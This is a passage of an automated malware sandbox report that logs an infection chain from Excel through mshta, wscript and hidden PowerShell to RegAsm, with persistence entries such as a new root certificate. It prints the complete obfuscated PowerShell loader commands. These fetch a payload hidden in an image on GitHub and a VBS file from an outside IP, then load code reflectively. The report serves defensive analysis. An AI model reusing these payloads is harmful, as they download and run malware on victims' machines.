Jlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,31_2_0041CBE1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899B022D push eax; iretd 5_2_000007FE899B0241
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899B00BD pushad ; iretd 5_2_000007FE899B00C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE899B79D7 push ebx; retf 14_2_000007FE899B79DA
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE899B022D push eax; iretd 14_2_000007FE899B0241
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE899B00BD pushad ; iretd 14_2_000007FE899B00C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_10002806 push ecx; ret 20_2_10002819
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0044693D push ecx; ret 24_2_0044694D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0044DB70 push eax; ret 24_2_0044DB84
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0044DB70 push eax; ret 24_2_0044DBAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00451D54 push eax; ret 24_2_00451D61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_0044B090 push eax; ret 25_2_0044B0A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_0044B090 push eax; ret 25_2_0044B0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00451D34 push eax; ret 25_2_00451D41
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00444E71 push ecx; ret 25_2_00444E81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00414060 push eax; ret 26_2_00414074
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00414060 push eax; ret 26_2_0041409C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00414039 push ecx; ret 26_2_00414049
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004164EB push 0000006Ah; retf 26_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00416553 push 0000006Ah; retf 26_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00416555 push 0000006Ah; retf 26_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004470B7 push eax; retf 0046h31_2_004470B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00457186 push ecx; ret 31_2_00457199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0045E55D push esi; ret 31_2_0045E566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00457AA8 push eax; ret 31_2_00457AC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00434EB6 push ecx; ret 31_2_00434EC9

                  Persistence and Installation Behavior

                  barindex
                  Installs new ROOT certificates
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00406EEB ShellExecuteW,URLDownloadToFileW,31_2_00406EEB
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,31_2_0041AADB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,31_2_0041CBE1
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
